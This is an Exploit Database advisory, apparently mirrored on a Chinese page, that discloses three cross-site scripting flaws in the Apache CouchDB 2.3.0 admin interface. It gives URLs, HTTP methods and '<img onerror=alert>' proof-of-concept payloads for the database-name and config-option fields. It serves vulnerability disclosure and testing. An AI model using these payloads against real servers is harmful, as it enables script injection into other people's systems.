Apache CouchDB 2.3.0 – Cross-Site Scripting

• Exploit Database
• 115 阅读

• 作者： Ozer Goker
  日期： 2019-02-18
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/46406/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65

  ################################################################################################################################## # Exploit Title: Apache CouchDB 2.3.0 | Cross-Site Scripting # Date: 17.02.2019 # Exploit Author: Ozer Goker # Vendor Homepage: http://couchdb.apache.org # Software Link: http://couchdb.apache.org/#download # Version: 2.3.0 ##################################################################################################################################   Introduction   A CouchDB server hosts named databases, which store documents. Each document is uniquely named in the database, and CouchDB provides a RESTful HTTP API for reading and updating (add, edit, delete) database documents.   #################################################################################   XSS details: DOM Based & Reflected & Stored   #################################################################################   XSS1 | DOM Based - Create Database   URL http://127.0.0.1:5984/_utils/#/_all_dbs     PAYLOAD <img src=x onerror=alert(1)>   <input id="js-new-database-name" type="text" class="input-xxlarge" placeholder="Name of database" value="<img src=x onerror=alert(1)>">   #################################################################################   XSS2 | DOM Based & Stored - Add Option   URL http://127.0.0.1:5984/_utils/#_config/couchdb@localhost http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E   METHOD Put   PAYLOAD <img src=x onerror=alert(2)>   <input class="input-option-name" type="text" name="name" placeholder="Name">   #################################################################################   XSS3 | DOM Based & Stored - Delete Option   URL http://127.0.0.1:5984/_utils/#_config/couchdb@localhost http://127.0.0.1:5984/_node/couchdb@localhost/_config/1/%3Cimg%20src%3Dx%20onerror%3Dalert(2)%3E   METHOD Delete   PAYLOAD <img src=x onerror=alert(2)>   #################################################################################